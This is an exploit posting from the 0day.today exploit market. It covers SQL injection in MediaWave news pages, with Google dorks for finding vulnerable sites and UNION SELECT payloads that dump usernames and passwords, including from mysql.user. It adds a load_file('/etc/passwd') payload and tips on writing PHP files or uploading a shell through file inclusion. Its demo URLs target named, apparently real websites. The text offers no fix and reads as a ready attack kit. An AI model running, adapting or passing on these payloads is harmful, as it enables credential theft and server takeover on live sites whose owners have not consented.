[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MediaWave (news) SQL Injection vulnerability

Author
CaSpErHaK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12711
Category
web applications
Date add
14-06-2010
Platform
php
============================================
MediaWave (news) SQL Injection vulnerability
============================================

# Exploit Title: [MediaWave(news)& more SQL injection]
# Date: [14-6-2010]
# Author: [CaSpErHaK]
# Tested on: [linux]

====================Founded By CaSpErHaK===============


Dork in google:- inurl:"news_d.php?id="
   and Another:- inurl:"news2.php?id="

# Exploit :

1st............http://[site/path/news_d.php?id={SQLi}

..........for site powered by MediaWave.....

# Poc :

  union select 1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user--
=================

# Demo :-

    http://www.veraqualitas.com/news_d.php?ID=-15+union+select+1,2,concat(ID,0x3a,nome,0x3a,pass),4+from+downloads_user--


==============================================================================================================

..........for 0ther site.......

# Poc :

  union select 1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser--
=================

# Demo :-

   http://www.levelone.eu/news_d.php?id=-90+union+select+1,2,3,4,5,6,7,8,concat(id,0x3a,loginid,0x3a,password),10,11+from+lon_adminuser--

================================================================================================================

# u can get to root in some sites from Table "mysql.user"

# Demo :-

  http://www.bedag.ch/news/news_d.php?id=-64+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(user,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+mysql.user--


==================================================================================================================
///////////////////////////////////////////////////////////////////////////////
# Exploit :

2nd...............http://[site]/path/news2.php?id={SQLi}



........................for site powered by MediaWave.............

# Poc :

  union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs--
================

# Demo :-

    http://www.aubergeduchasseur.ch/news2.php?ID=-54+union select 1,2,3,concat(id,0x3a,usr,0x3a,pwd)+from+ssp_usrs--

================================================================================================================


# ................for version 4............

# Poc :
  
    union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users--

# Demo :
    
    http://www.almaddbepk.com/news2.php?id=-35+union+select+1,2,3,4,5,concat(user,0x3a,password),7+from+users--

================================================================================================================

# Note :

    1  in u found version "5.0.84-log" from Database.......
    0  u can use order SQL "load_file('/etc/passwd')
    1  must be magic quotes=OFF by get to folder have chmod 777 u can inject file have extention ".php" 
    0  and have Remote File Inclusion then u can upload shell.txt? from any site
    1  by get to folder have chmod 777
====================

# Demo  :
   
   http://www.mediawave.ch/news2_fr.php?ID=25+union+select+1,2,3,4,5,6,7,load_file('/etc/passwd')--

===============================================================================================================


Greetz to>>>>> H4ckforu Team.. KONDAMNE , Mr.Nid4 , Anti-tr4Ck3r , ra3ch

& All Muslim KackeRs

http://www.h4ckforu.com


# Email : Casper_x28[at]hotmail.com



#  0day.today [2024-12-29]  #